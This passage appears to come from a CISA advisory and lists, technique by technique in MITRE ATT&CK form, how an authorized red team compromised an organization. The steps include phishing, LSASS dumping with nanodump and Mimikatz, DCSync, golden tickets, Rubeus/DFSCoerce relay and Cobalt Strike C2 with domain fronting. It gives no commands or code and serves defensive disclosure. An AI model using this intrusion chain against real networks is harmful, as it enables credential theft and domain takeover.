Gather Victim Identify Information: Employee Names T1589.003 The team identified employee names via open-source research that could be used to derive email addresses.
Gather Victim Network Information: Network Security AppliancesT1590.006The team identified the organization’s MDM vendor and leveraged that information to move laterally to SBS-connected assets.
Gather Victim Org InformationT1591The team conducted open-source research and identified an organizational branch that likely had access to an SBS asset.
Gather Victim Org Information: Determine Physical LocationsT1591.001The team conducted open-source research to identify the physical locations of upkeep/management staff of selected assets.
Search Open Technical Databases: Scan Databases T1596.005The team queried an MDM SQL database to identify target administrators who recently connected with the MDM.
 Resource Development 
Technique TitleIDUse
Acquire InfrastructureT1583The team used third-party owned and operated infrastructure throughout their assessment for C2.
Establish Accounts: Email AccountsT1585.002The team used commercially available email platforms for their spearphishing activity.
Obtain Capabilities: ToolT1588.002The team used the following tools:Cobalt Strike and Merlin payloads for C2.KeeThief to obtain a decryption key from a KeePass databaseRubeus and DFSCoerce in an NTLM relay attack
 Initial Access 
Technique TitleIDUse
Phishing: Spearphishing LinkT1566.002The team sent spearphishing emails with links to a red-team-controlled domain to gain access to the organization’s systems.
 Execution 
Technique TitleIDUse
Native APIT1106The team created a policy via the MDM API, which downloaded and executed a payload on a workstation.
User ExecutionT1204Users downloaded and executed the team’s initial access payloads after clicking buttons to trigger download and execution.
 Persistence 
Technique TitleIDUse 
Account ManipulationT1098The team elevated account privileges to administrator and modified the user’s account by adding Create Policy and Delete Policy permissions.During Phase II, the team created local admin accounts and an AD account; they added the created AD account to a domain admins group.
Create Account: Local AccountT1136.001During Phase II, the team created a local administrator account on a workstation and a server.
Create Account: Domain AccountT1136.002During Phase II, the team created an AD account.
Create or Modify System Process: Windows ServiceT1543.003During Phase II, the team leveraged compromised workstation and domain admin accounts to execute a payload via Windows Service Creation on target workstations and the DC.
Event Triggered Execution: Windows Management Instrumentation Event SubscriptionT1546.003The team used WMI Event Subscriptions to move laterally between sites.
Hijack Execution Flow: DLL Search Order HijackingT1574.001The team used DLL hijacking to move laterally between sites.
 Privilege Escalation 
Technique TitleIDUse
Abuse Elevation Control MechanismT1548The team elevated user account privileges to administrator by modifying the user’s account via adding Create Policy and Delete Policy permissions.
 Defense Evasion 
Technique TitleIDUse
Valid Accounts: Domain AccountsT1078.002During Phase II, the team compromised a domain admin account and used it to laterally to multiple workstations and the DC.
 Credential Access 
Technique TitleIDUse
OS Credential Dumping: LSASS MemoryT1003.001The team obtained the cached credentials from a SharePoint server account by taking a snapshot of lsass.exe with a tool called nanodump, exporting the output and processing the output offline with Mimikatz.
OS Credential Dumping: DCSyncT1003.006The team harvested AES-256 hashes via DCSync.
Brute Force: Password CrackingT1110.002The team cracked a user’s workstation account password after learning the user’s patterns from plaintext credentials.
Unsecured CredentialsT1552The team found backups of a MySQL database that contained the encryption key needed to decrypt SSH passwords.
Unsecured Credentials: Credentials in FilesT1552.001The team found plaintext credentials to an API user account stored in PowerShell scripts on an MDM server.
Unsecured Credentials: Bash HistoryT1552.003The team found bash history files on a Workstation 5, and the files appeared to be SSH passwords saved in bash history.
Credentials from Password Stores: Password ManagersT1555.005The team pulled credentials from a KeePass database. 
Adversary-in-the-middle: LLMNR/NBT-NS Poisoning and SMB RelayT1557.001The team ran the DFSCoerce python script, which prompted DC authentication to a server using the server’s NTLM hash. The team then deployed Rubeus to capture the incoming DC TGT.
Steal or Forge Kerberos Tickets: Golden TicketT1558.001The team used the acquired krbtgt account hash throughout their assessment to forge legitimate TGTs.
Steal or Forge Kerberos Tickets: KerberoastingT1558.003The team leveraged Rubeus and DFSCoerce in a NTLM relay attack to obtain the DC’s TGT from a host with Unconstrained Delegation enabled.
 Discovery 
Technique TitleIDUse
System Network Configuration DiscoveryT1016The team queried the AD for information about the network’s sites and subnets. 
Remote System DiscoveryT1018The team queried the AD, during phase I and II, for information about computers on the network. 
System Network Connections DiscoveryT1049The team listed existing network connections on SCCM Server 1 to reveal an active SMB connection with server 2.
Permission Groups Discovery: Domain GroupsT1069.002The team leveraged ldapsearch and dsquery to query and scrape active directory information. 
Account Discovery: Domain AccountT1087.002The team queried AD for AD users (during Phase I and II), including for members of a SharePoint admin group and several standard user accounts with administrative access.
Cloud Infrastructure DiscoveryT1580The team found SecOps network diagrams on a host detailing cloud infrastructure boundaries.
Domain Trust DiscoveryT1482During Phase II, the team enumerated trust relationships within the AD Forest.
Group Policy DiscoveryT1615The team scraped AD information, including GPOs.
Network Service DiscoveryT1046During Phase II, the team enumerated ports on target systems from a previously compromised workstation.
System Owner/User DiscoveryT1033During Phase II, the team enumerated the AD for current session information from every domain computer (Workstation and Server).
 Lateral Movement 
Technique TitleIDUse
Remote Services: SMB/Windows Admin SharesT1021.002The team moved laterally with an SMB beacon.During Phase II, they used compromised workstation and domain admin accounts to upload a payload via SMB on several target Workstations and the DC.
Use Alternate Authentication Material: Pass the HashT1550.002The team ran the DFSCoerce python script, which prompted DC authentication to a server using the server’s NTLM hash. The team then deployed Rubeus to capture the incoming DC TGT.
Pass the TicketT1550.003The team used the asktgt command to impersonate accounts for which they had credentials by requesting account TGTs.
 Command and Control 
Technique TitleIDUse
Application Layer ProtocolT1071The team remotely enumerated the local administrators group on target hosts to find valid user accounts. This technique relies on anonymous SMB pipe binds, which are disabled by default starting with Server 2016.During Phase II, the team established sessions that originated from a target Workstation and from the DC directly to an external host over a clear text protocol.
Application Layer Protocol: Web ProtocolsT1071.001The team’s C2 redirectors used HTTPS reverse proxies to redirect C2 traffic.
Application Layer Protocol: File Transfer ProtocolsT1071.002The team used HTTPS reverse proxies to redirect C2 traffic between target network and the team’s Cobalt Strike servers.
Encrypted ChannelT1573The team’s C2 traffic was encrypted in transit using encryption keys stored on their C2 servers.
Ingress Tool TransferT1105During Phase II, the team uploaded and executed well-known malicious files to the DC to generate host-based alerts.
Proxy: External ProxyT1090.002The team used redirectors to redirect C2 traffic between the target organization’s network and the team’s C2 servers.
Proxy: Domain FrontingT1090.004The team used domain fronting to disguise outbound traffic in order to diversify the domains with which the persistent beacons were communicating.
 Impact 
Technique TitleIDUse
Account Access RemovalT1531During Phase II, the team locked out several administrative AD accounts.

Please share your thoughts. We recently updated our anonymous Product Feedback Survey and we’d welcome your feedback.

Source :
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-059a